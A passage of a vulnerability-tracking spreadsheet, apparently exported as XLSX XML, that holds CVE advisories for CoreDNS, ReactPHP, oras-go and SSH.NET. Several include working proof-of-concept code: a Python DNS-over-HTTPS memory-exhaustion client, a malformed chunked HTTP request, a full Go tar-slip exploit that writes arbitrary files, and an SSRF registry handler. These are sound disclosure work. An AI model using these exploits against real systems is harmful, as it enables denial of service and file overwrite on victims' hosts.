- [DoQ stream handling](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_quic.go#L212-L219).
- [DNS-over-gRPC query handling](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_grpc.go#L176-L184).
This differs from the [miekg/dns](https://github.com/miekg/dns) UDP and TCP server. Its [`serveDNS`](https://github.com/miekg/dns/blob/v1.1.72/server.go#L628-L643) path decodes the fixed 12-byte header and invokes [`DefaultMsgAcceptFunc`](https://github.com/miekg/dns/blob/v1.1.72/acceptfunc.go#L33-L57) before unpacking the DNS sections. The default policy rejects requests unless `QDCOUNT` is exactly one and also limits the other section counts. CoreDNS's custom transports bypass this early validation.
Parsing happens before the plugin chain. Plugin-level rate limiting or request handling cannot prevent the allocation. The fix is to apply `dns.DefaultMsgAcceptFunc` to the fixed header before calling `Msg.Unpack` in each custom request transport. Response decoding must remain separate because the request policy intentionally rejects response headers.
### PoC
The PoC runs against the DoH server.
Run the following from a clean checkout of CoreDNS v1.14.6. Docker must support container memory limits. The example uses the test certificate already present in the repository and publishes the test service only on loopback.
Save this as `Corefile.cd01`:
```text
https://.:8053 {
    tls /cert.pem /key.pem
    whoami
}
```
Save this standard-library client as `poc-cd01.py`:
```python
#!/usr/bin/env python3
import argparse
import concurrent.futures
from collections import Counter
import http.client
import ssl
import struct
def normal_query():
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    question = b"\x07example\x03org\x00" + struct.pack("!HH", 1, 1)
    return header + question, 1
def attack_query():
    message = bytearray(65535)
    offset = 12
    name_offset = offset
    for size in (63, 63, 63, 61):
        message[offset] = size
        offset += 1
        message[offset : offset + size] = b"\x01" * size
        offset += size
    message[offset] = 0
    offset += 1
    struct.pack_into("!HH", message, offset, 1, 1)
    offset += 4
    questions = 1
    while offset + 6 &lt;= len(message):
        struct.pack_into("!HHH", message, offset, 0xC000 | name_offset, 1, 1)
        offset += 6
        questions += 1
    struct.pack_into(
        "!HHHHHH", message, 0, 0x1234, 0x0100, questions, 0, 0, 0
    )
    return bytes(message[:offset]), questions
def send(payload):
    context = ssl._create_unverified_context()
    connection = http.client.HTTPSConnection(
        "127.0.0.1", 18053, timeout=3, context=context
    )
    try:
        connection.request(
            "POST",
            "/dns-query",
            body=payload,
            headers={"Content-Type": "application/dns-message"},
        )
        response = connection.getresponse()
        response.read()
        return f"http-{response.status}"
    except Exception:
        return "error"
    finally:
        connection.close()
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--normal", action="store_true")
    parser.add_argument("--workers", type=int, default=1)
    args = parser.parse_args()
    payload, questions = normal_query() if args.normal else attack_query()
    print(
        f"payload={len(payload)} questions={questions} workers={args.workers}"
    )
    with concurrent.futures.ThreadPoolExecutor(args.workers) as pool:
        results = pool.map(send, [payload] * args.workers)
    print(Counter(results))
if __name__ == "__main__":
    main()
```
Build the Linux binary and container image:
```sh
GOCACHE=/tmp/coredns-gocache \
GOOS=linux GOARCH="$(go env GOARCH)" CGO_ENABLED=0 \
go build -tags=grpcnotrace -o coredns .
docker build --tag coredns-cd01:vulnerable .
```
Start CoreDNS with a 64 MiB memory and swap limit:
```sh
docker run --detach --name coredns-cd01 \
  --memory 64m --memory-swap 64m \
  --publish 127.0.0.1:18053:8053/tcp \
  --volume "$PWD/Corefile.cd01:/Corefile:ro" \
  --volume "$PWD/plugin/tls/test_cert.pem:/cert.pem:ro" \
  --volume "$PWD/plugin/tls/test_key.pem:/key.pem:ro" \
  coredns-cd01:vulnerable -conf /Corefile
```
Confirm that the listener works and that one malicious request is accepted:
```console
$ python3 poc-cd01.py --normal
payload=29 questions=1 workers=1
Counter({'http-200': 1})
$ python3 poc-cd01.py
payload=65533 questions=10878 workers=1
Counter({'http-200': 1})
```
Send 32 malicious requests concurrently and inspect the container:
```console
$ python3 poc-cd01.py --workers 32
payload=65533 questions=10878 workers=32
Counter({'error': 32})
$ docker inspect --format '{{.State.Status}} OOMKilled={{.State.OOMKilled}} ExitCode={{.State.ExitCode}}' coredns-cd01
exited OOMKilled=true ExitCode=137
```
`OOMKilled=true` confirms that the container was terminated by memory exhaustion rather than a CoreDNS configuration error.
### Impact
This is an unauthenticated denial-of-service vulnerability. Deployments are affected when DoH, DoH3, DoQ, or DNS-over-gRPC is exposed to an attacker. The ordinary miekg/dns UDP and TCP listeners are not affected because they perform the header acceptance check before unpacking.
In the validated configuration, 32 requests OOM-killed a CoreDNS container limited to 64 MiB. Higher memory limits increase the number of concurrent requests required but do not remove the allocation amplification. Successful exploitation interrupts DNS service.
CoreDNS versions v007 through v1.14.6 are affected when DNS-over-gRPC is exposed. DoH is affected from v1.1.3, DoQ from v1.11.0, and DoH3 from v1.13.2.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84997</t>
        </is>
      </c>
      <c r="D31" s="5" t="inlineStr"/>
      <c r="E31" s="5" t="inlineStr"/>
      <c r="F31" s="5" t="inlineStr"/>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>composer:react/http</t>
        </is>
      </c>
      <c r="M31" s="5" t="inlineStr">
        <is>
          <t>1.11.1</t>
        </is>
      </c>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr"/>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>### Summary
A malformed HTTP message using `Transfer-Encoding: chunked` can drive `React\Http\Io\ChunkedDecoder` into an infinite loop, pegging a CPU core and freezing the event loop. Because ReactPHP is single-threaded, one such message stalls the entire process for every client until it is killed.
Both directions are affected. `ChunkedDecoder` decodes chunked **request** bodies for `React\Http\HttpServer` and chunked **response** bodies for `React\Http\Browser`, so a server can be attacked by a malicious client and a client can be attacked by a malicious or compromised server.
### Details
`ChunkedDecoder::handleData()` loops `while ($this-&gt;buffer !== '')` and relies on the buffer shrinking each iteration. Two states leave the buffer unchanged while the loop condition stays true.
**Terminal-chunk trailer.** After the terminating `0` chunk, any remaining buffer is treated as trailer data to skip:
```php
} elseif ($this-&gt;chunkSize === 0) {
    $this-&gt;buffer = (string)\substr($this-&gt;buffer, $positionCrlf);
}
```
When the trailer holds no CRLF yet, `strpos()` returns `false`, PHP coerces that to `0` in `substr()`, and the buffer is never advanced. Neither the error guard (which requires a non-zero chunk size) nor the wait guard (which requires fewer than two bytes remaining) can fire, so the loop re-enters with identical state.
**Off-by-one after a completed chunk.** Once a non-terminal chunk has been fully transferred, the "chunk does not end with a CRLF" error guard requires `strlen($this-&gt;buffer) &gt; 2` while the wait guard requires `&lt; 2`. Exactly two non-CRLF bytes slip past both, and because the chunk is already complete nothing is consumed on the next iteration.
### PoC
Run the example server from the `reactphp/reactphp` README and send a malformed request. Note the missing trailing `\r\n`:
```
POST / HTTP/1.1\r\nHost: x\r\nTransfer-Encoding: chunked\r\n\r\n0\r\nab
```
The PHP process pegs at 100% CPU and stops answering legitimate requests. A body of `1\r\nAAB` triggers the second state.
The client side is reachable the same way: a `Browser` request to a server that answers with `Transfer-Encoding: chunked` and either malformed body shape hangs the client process.
### Impact
Denial of service. The affected process stops responding entirely and has to be killed.
Servers behind a reverse proxy that parses and re-frames HTTP, such as a typical nginx setup, are not affected on the **server** side, because the proxy normalises the request before it reaches PHP. That mitigation does not extend to the **client** side: outbound requests made with `Browser` reach the remote server directly, so an application fetching attacker-influenced URLs is affected regardless of what sits in front of it.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84997</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85731</t>
        </is>
      </c>
      <c r="D32" s="5" t="inlineStr"/>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>go:oras.land/oras-go/v2</t>
        </is>
      </c>
      <c r="M32" s="5" t="inlineStr">
        <is>
          <t>2.6.2</t>
        </is>
      </c>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr"/>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `content/file.Store` in oras-go v2 unpacks OCI layer tarballs when a descriptor carries `io.deis.oras.content.unpack=true`. The extraction routine validates symlink targets purely lexically (`filepath.Join`) and, for regular files placed directly at the extraction root, skips the parent-symlink `Lstat` walk. A malicious tarball can plant a chain of symlinks whose lexical target stays inside the extraction root but whose kernel-resolved target is any absolute path, then write through it with a follow-up regular-file entry. The result is arbitrary file create/overwrite outside the store's working directory under the default `AllowPathTraversalOnWrite=false` configuration — a canonical tar-slip → RCE primitive.
### Details
**Affected versions:** `&lt;= v2.6.1`
**Entry point:** `content/file/file.go` line 486, `(*Store).pushDir` — reached from `(*Store).Push` for any descriptor whose annotations include `io.deis.oras.content.unpack: "true"` (i.e. `file.AnnotationUnpack`) and an `org.opencontainers.image.title`. `oras.Copy` from a remote registry into a `file.New(dir)` store invokes this per layer.
**Root cause 1 — lexical link validation.** `content/file/utils.go` lines 264–275, `ensureLinkPath`:
```go
func ensureLinkPath(baseAbs, baseRel, link, target string) (string, error) {
        // resolve link
        path := target
        if !filepath.IsAbs(target) {
                path = filepath.Join(filepath.Dir(link), target)
        }
        // ensure path is under baseAbs or baseRel
        if _, err := resolveRelToBase(baseAbs, baseRel, path); err != nil {
                return "", err
        }
        return target, nil
}
```
`filepath.Join` cleans `..` components textually and does **not** dereference symlinks in intermediate components. It therefore cannot detect that a component of `target` is itself a previously-extracted symlink that the kernel will follow before applying subsequent `..` components.
**Root cause 2 — parent-symlink check skipped for root-level entries.** `content/file/utils.go` lines 247–257, inside `resolveRelToBase`:
```go
// No symbolic link allowed in the relative path
dir := filepath.Dir(path)
for dir != "." {
        if info, err := os.Lstat(filepath.Join(baseAbs, dir)); err != nil {
                ...
        } else if info.Mode()&amp;os.ModeSymlink != 0 {
                return "", fmt.Errorf("no symbolic link allowed between %q and %q", baseRel, target)
        }
        dir = filepath.Dir(dir)
}
```
For an entry named `&lt;title&gt;/escape`, `path == "escape"` and `filepath.Dir("escape") == "."`, so the loop body never executes — the entry itself is never `Lstat`-checked.
**Root cause 3 — write follows symlinks.** `content/file/utils.go` line 279, `writeFile`:
```go
file, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm)
```
No `O_NOFOLLOW`, so if `path` is a symlink the write goes to its target.
**Data flow / exploit construction.** Let `baseAbs = &lt;workingDir&gt;/&lt;title&gt;` and `N = depth(baseAbs)` (number of path components from `/`). The attacker's tar.gz contains, in order:
1. `N` nested directories `&lt;title&gt;/d0/d1/…/d{N-1}`.
2. A symlink `&lt;title&gt;/d0/…/d{N-1}/up` → `"../../…"` (`N` levels). Both lexically and on disk this resolves to `baseAbs`, so `ensureLinkPath` accepts it and `resolveRelToBase` sees only real directories in its ancestry.
3. A symlink `&lt;title&gt;/escape` → `"d0/…/d{N-1}/up/../../…/&lt;absTarget&gt;"` (`N` `..` components after `up`). **Lexically**, `filepath.Join(baseAbs, "d0/…/up/../…/&lt;absTarget&gt;")` cancels the `N` `..` against `up` plus `d{N-2}…d0`, yielding `baseAbs/d0/&lt;absTarget&gt;` — inside the root, so `ensureLinkPath` accepts it. `resolveRelToBase` then walks `d0/&lt;absTarget-parents&gt;`, none of which are symlinks (they don't exist), so the link is created. **At the kernel**, resolving `baseAbs/d0/…/up` first follows `up` back to `baseAbs`, and the remaining `N` `..` components climb from `baseAbs` to `/`, then `&lt;absTarget&gt;` is appended — the symlink points at the attacker-chosen absolute path.
4. A regular file `&lt;title&gt;/escape` (same name). `resolveRelToBase("escape")` yields `dir == "."` (root cause 2), so no `Lstat` is performed. `extractTarDirectory` (line 181) calls `writeFile` which opens `baseAbs/escape` with `O_TRUNC` and no `O_NOFOLLOW` (root cause 3), writing the attacker's payload through the symlink to `&lt;absTarget&gt;`.
**Why v2.6.1's `checkSymlinkEscape` does not help.** The fix for GHSA-8xwf-rjm4-xvhv added a symlink-resolving containment check, but it is called only from `resolveWritePath` (`content/file/file.go` line 632) on the **`pushFile`** path. `pushDir` → `extractTarGzip` → `extractTarDirectory` never calls it; `content/file/utils.go` is byte-identical between v2.6.0 and v2.6.1.
**Suggested remediation.** Any of: (a) `Lstat` the final path component before opening for write and reject symlinks; (b) open with `O_NOFOLLOW` (or `O_EXCL` for new files); (c) resolve link targets with `filepath.EvalSymlinks` on the deepest existing ancestor (as `checkSymlinkEscape` already does) instead of lexical `filepath.Join`; (d) extract into a fresh empty directory and use `openat2(RESOLVE_BENEATH)` / `os.Root` (Go 1.24+) for all filesystem operations.
### PoC
```
go mod init poc
go get oras.land/oras-go/v2@v2.6.1
go run .
```
```go
// Arbitrary file write outside a default-configured file.Store via
// symlink-chain bypass in content/file.extractTarDirectory.
//
// ensureLinkPath() validates symlink targets purely lexically with
// filepath.Join, which collapses ".." textually and does not follow
// intermediate symlink components. By first planting a deep "up" symlink
// that legitimately resolves to the extraction root, an "escape" symlink
// can be crafted whose lexical target stays in-bounds but whose
// kernel-resolved target is any absolute path. A follow-up TypeReg entry
// with the same name is opened with O_CREATE|O_TRUNC (no O_NOFOLLOW),
// writing through the symlink.
//
// Realistic trigger: oras.Copy() from an untrusted registry into a
// file.New() store. The attacker controls the manifest (sets
// AnnotationTitle + AnnotationUnpack=true on a layer) and the layer blob.
// All digests are honest, so content verification passes.
package main
import (
        "archive/tar"
        "bytes"
        "compress/gzip"
        "context"
        _ "crypto/sha256"
        "fmt"
        "os"
        "path/filepath"
        "strings"
        "github.com/opencontainers/go-digest"
        ocispec "github.com/opencontainers/image-spec/specs-go/v1"
        "oras.land/oras-go/v2/content/file"
)
func main() {
        if err := run(); err != nil {
                fmt.Println("ERROR:", err)
                os.Exit(1)
        }
}
func run() error {
        ctx := context.Background()
        // Victim's working directory for the file store.
        workDir, err := os.MkdirTemp("", "oras-victim-*")
        if err != nil {
                return err
        }
        defer os.RemoveAll(workDir)
        fmt.Println("[*] file.Store working dir:", workDir)
        // Target path the attacker wants to write, OUTSIDE workDir.
        // (Could be ~/.ssh/authorized_keys, ~/.bashrc, /etc/cron.d/x, etc.;
        // a temp path keeps the demo self-contained.)
        outsidePath := filepath.Join(os.TempDir(), "oras-PWNED")
        _ = os.Remove(outsidePath)
        defer os.Remove(outsidePath)
        fmt.Println("[*] attacker target (outside workDir):", outsidePath)
        // The layer's AnnotationTitle. extractTarDirectory uses this as both the
        // in-tar prefix and the on-disk subdir under workDir.
        const title = "out"
        baseAbs := filepath.Join(workDir, title)
        // N nested dirs + a symlink "up" -&gt; N*"../" so that after the kernel
        // follows "up" (landing at baseAbs) the remaining N lexical ".."
        // components climb from baseAbs to "/". N must be &gt;= depth(baseAbs).
        depth := len(strings.Split(strings.Trim(filepath.ToSlash(baseAbs), "/"), "/"))
        fmt.Printf("[*] baseAbs depth = %d, building %d nested dirs\n", depth, depth)
        gz, dgst, size, err := buildMaliciousLayer(title, depth, outsidePath)
        if err != nil {
                return err
        }
        // Descriptor exactly as it would appear in a manifest's "layers" array.
        desc := ocispec.Descriptor{
                MediaType: "application/vnd.oci.image.layer.v1.tar+gzip",
                Digest:    dgst,
                Size:      size,
                Annotations: map[string]string{
                        ocispec.AnnotationTitle: title,
                        file.AnnotationUnpack:   "true",
                },
        }
        // Victim creates a file store with default settings (path traversal DISALLOWED).
        store, err := file.New(workDir)
        if err != nil {
                return err
        }
        defer store.Close()
        fmt.Println("[*] store.AllowPathTraversalOnWrite =", store.AllowPathTraversalOnWrite)
        // This is exactly what oras.Copy() invokes per layer.
        if err := store.Push(ctx, desc, bytes.NewReader(gz)); err != nil {
                return fmt.Errorf("Push: %w", err)
        }
        // Check whether the out-of-tree file was written.
        if data, err := os.ReadFile(outsidePath); err == nil {
                rel, _ := filepath.Rel(workDir, outsidePath)
                fmt.Printf("\n[!] BYPASS: wrote %q to %s\n", string(data), outsidePath)
                fmt.Printf("[!] relative to workDir: %s\n", rel)
                fmt.Println("[!] PATH TRAVERSAL CONFIRMED - file written OUTSIDE file.Store working dir")
                return nil
        }
        fmt.Println("\n[-] no escape (file not created at", outsidePath, ")")
        return nil
}
// buildMaliciousLayer builds a tar.gz that, when extracted by
// content/file.extractTarDirectory under &lt;workDir&gt;/&lt;title&gt;, writes to outsidePath.
func buildMaliciousLayer(title string, depth int, outsidePath string) ([]byte, digest.Digest, int64, error) {
        var buf bytes.Buffer
        gzw := gzip.NewWriter(&amp;buf)
        tw := tar.NewWriter(gzw)
        // 1. Nested directories: title/d0/d1/.../d{depth-1}
        dirs := make([]string, depth)
        for i := 0; i &lt; depth; i++ {
                dirs[i] = fmt.Sprintf("d%d", i)
        }
        for i := 1; i &lt;= depth; i++ {
                name := title + "/" + strings.Join(dirs[:i], "/")
                if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeDir, Name: name, Mode: 0o755}); err != nil {
                        return nil, "", 0, err
                }
        }
        // 2. "up" symlink at the bottom, pointing back to baseAbs via depth*"../".
        //    Lexically AND on disk this resolves to baseAbs - passes ensureLinkPath.
        upName := title + "/" + strings.Join(dirs, "/") + "/up"
        upTarget := strings.Repeat("../", depth-1) + ".."
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeSymlink, Name: upName, Linkname: upTarget, Mode: 0o777}); err != nil {
                return nil, "", 0, err
        }
        // 3. "escape" symlink at title/escape.
        //    Target = d0/.../d{N-1}/up/../.. (N times) /&lt;outsidePath&gt;
        //    LEXICAL clean: the N ".." cancel "up" + (N-1) dirs, leaving
        //      d0/&lt;outsidePath&gt;  - INSIDE baseAbs, so ensureLinkPath accepts it.
        //    KERNEL: d0/.../up follows the symlink to baseAbs, then N*".."
        //      climbs to "/", then appends outsidePath.
        dots := strings.Repeat("../", depth-1) + ".."
        escapeTarget := strings.Join(dirs, "/") + "/up/" + dots + outsidePath
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeSymlink, Name: title + "/escape", Linkname: escapeTarget, Mode: 0o777}); err != nil {
                return nil, "", 0, err
        }
        // 4. Regular file entry at title/escape - same path as the symlink.
        //    resolveRelToBase("escape") has dir=="." so the per-component Lstat
        //    loop never runs; writeFile opens with O_CREATE|O_TRUNC (no
        //    O_NOFOLLOW) and writes through the symlink to outsidePath.
        payload := []byte("PWNED-BY-ORAS-TARSLIP")
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeReg, Name: title + "/escape", Mode: 0o644, Size: int64(len(payload))}); err != nil {
                return nil, "", 0, err
        }
        if _, err := tw.Write(payload); err != nil {
                return nil, "", 0, err
        }
        if err := tw.Close(); err != nil {
                return nil, "", 0, err
        }
        if err := gzw.Close(); err != nil {
                return nil, "", 0, err
        }
        data := buf.Bytes()
        return data, digest.FromBytes(data), int64(len(data)), nil
}
```
Expected output (paths vary):
```
[*] file.Store working dir: /tmp/oras-victim-209731351
[*] attacker target (outside workDir): /tmp/oras-PWNED
[*] baseAbs depth = 3, building 3 nested dirs
[*] store.AllowPathTraversalOnWrite = false
[!] BYPASS: wrote "PWNED-BY-ORAS-TARSLIP" to /tmp/oras-PWNED
[!] relative to workDir: ../oras-PWNED
[!] PATH TRAVERSAL CONFIRMED - file written OUTSIDE file.Store working dir
```
### Impact
**Who is affected:** Any application that pulls or pushes OCI artifacts from an untrusted or attacker-influenced source into a `content/file.Store` — e.g. `oras.Copy(ctx, remoteRepo, ref, file.New(dir), ref, opts)`, the documented primary use of the file store — with default settings (`AllowPathTraversalOnWrite=false`, `SkipUnpack=false`). Downstream consumers include the ORAS CLI (`oras pull` to a directory) and tools built on oras-go that materialise artifact contents on disk.
**What the attacker gains:** Arbitrary file create/overwrite anywhere writable by the pulling process. Practical escalations include overwriting `~/.ssh/authorized_keys`, `~/.bashrc`/`~/.profile`, Git hooks, or (when running as root, e.g. in CI or a controller) `/etc/cron.d/*` or binaries on `$PATH` — i.e. remote code execution on the victim host.
**Preconditions / reachability:** No local preconditions beyond pulling an attacker-controlled artifact; the attacker does **not** need any pre-existing symlink in the victim's working directory (unlike GHSA-8xwf-rjm4-xvhv / CVE-2026-50162, which this issue is distinct from). The attack is delivered over the network via a registry the victim pulls from; no authentication to the victim is required. User interaction is limited to the victim choosing to pull the artifact (`UI:R`).</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85731</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85732</t>
        </is>
      </c>
      <c r="D33" s="5" t="inlineStr"/>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>go:oras.land/oras-go/v2</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr">
        <is>
          <t>2.6.2</t>
        </is>
      </c>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr"/>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>## Summary
oras-go's pagination helper `parseLink()` in `registry/remote/utils.go` follows the `Link` response header from a registry without validating the URL's host or scheme. When a malicious registry returns a `Link` header containing an absolute URL pointing to an arbitrary host (e.g., a cloud metadata endpoint), the client makes GET requests to that host from the victim's network.
This affects all pagination-based listing operations: Tags, Referrers, and Repositories (catalog).
## Root Cause
`parseLink()` at `registry/remote/utils.go:54` calls `resp.Request.URL.Parse(link)` which, for absolute URLs, returns the absolute URL unchanged. The result is passed directly to the next pagination loop iteration where `http.NewRequestWithContext()` creates a GET request to the attacker-specified URL. No host comparison, scheme validation, or IP filtering exists between `parseLink` output and the HTTP request.
## Affected Code Paths
- `registry/remote/repository.go:Tags()` calls `parseLink()` for next page URL
- `registry/remote/repository.go:Referrers()` calls `parseLink()` for next page URL
- `registry/remote/registry.go:Repositories()` calls `parseLink()` for next page URL
## Impact
**Blind SSRF from the victim's network.** A malicious registry operator can force any oras-go client that lists tags, referrers, or repositories to issue GET requests to arbitrary internal endpoints:
- Cloud instance metadata endpoints for service discovery and IAM role enumeration
- Internal HTTP services for port scanning and triggering side effects
- If the victim's credential store maps credentials for the SSRF target host, those credentials are attached to the request (auth.Client looks up creds by request host)
The attacker cannot read the response body (it's parsed as JSON and fails), making this a blind SSRF. However, timing and error differences can confirm internal service existence.
## Attack Chain
1. Victim calls `repo.Tags()` / `repo.Referrers()` / `registry.Repositories()` against attacker-controlled registry
2. Registry returns a valid first page + malicious Link header pointing to an internal endpoint
3. `parseLink()` extracts the absolute URL with zero validation
4. Pagination loop makes GET request to the internal endpoint from victim's network
## PoC
&lt;details&gt;
&lt;summary&gt;Expand PoC&lt;/summary&gt;
```go
// Malicious registry handler for /v2/repo/tags/list:
func handler(w http.ResponseWriter, r *http.Request) {
    // Link header points to cloud metadata or internal service
    w.Header().Set("Link", `&lt;http://internal-service:8080/admin&gt;; rel="next"`)
    w.Header().Set("Content-Type", "application/json")
    json.NewEncoder(w).Encode(map[string][]string{"tags": {"v1"}})
}
// Victim code:
repo, _ := remote.NewRepository("attacker-registry.io/repo")
repo.Tags(ctx, "", func(tags []string) error { return nil })
// Result: GET http://internal-service:8080/admin is made from victim's network
```
&lt;/details&gt;
## Suggested Fix
Validate that the URL returned by `parseLink()` has the same host and scheme as the original request before using it for the next pagination request. Reject cross-host or scheme-downgrade URLs.
Reported by **zx (Jace)**</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85732</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85756</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr"/>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>nuget:SSH.NET</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr">
        <is>
          <t>2026.0.0</t>
        </is>
      </c>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr"/>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>## Summary
Default SCP remote-path handling places caller-supplied paths into the command that runs scp on the server. On a shell-based server that command is interpreted by a shell, so an attacker-influenced path that is not quoted to suit that shell can execute as a command as the authenticated SSH user. SSH.NET provides `ScpClient.RemotePathTransformation` to control escaping behaviour (defaulting to `RemotePathTransformation.DoubleQuote`) but cannot guarantee safety for arbitrary remote command interpreters. This is inherent to running scp over a remote shell (cf. CVE-2020-15778).
## Impact
Command execution on the SSH server as the authenticated SSH user, when an application passes an attacker-influenced remote path to ScpClient against a shell-based server.
Exploitation depends on conditions beyond the attacker's control: the remote server must be shell-based, and the attacker-influenced path must be crafted to defeat the quoting applied by the transformation in effect — that is, to use metacharacters that it does not neutralise (for example $(...) or backticks, which survive the default double-quoting on a POSIX shell). A path that does not meet these escaping rules, or a non-shell-based server, does not result in command execution.
## Remediation
The fixed release obsoletes the constructors that silently defaulted the path transformation and adds constructors that require an explicit `IRemotePathTransformation`, so callers are required to choose one that suits their server and trust environment. For POSIX shells, the library provides `RemotePathTransformation.ShellQuote`. The legacy default (`RemotePathTransformation.DoubleQuote`) is unchanged for backwards compatibility. SCP is considered legacy and SFTP, which does not involve a remote shell, is recommended where possible (via `SftpClient`).</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85756</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D35" s="5" t="inlineStr"/>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
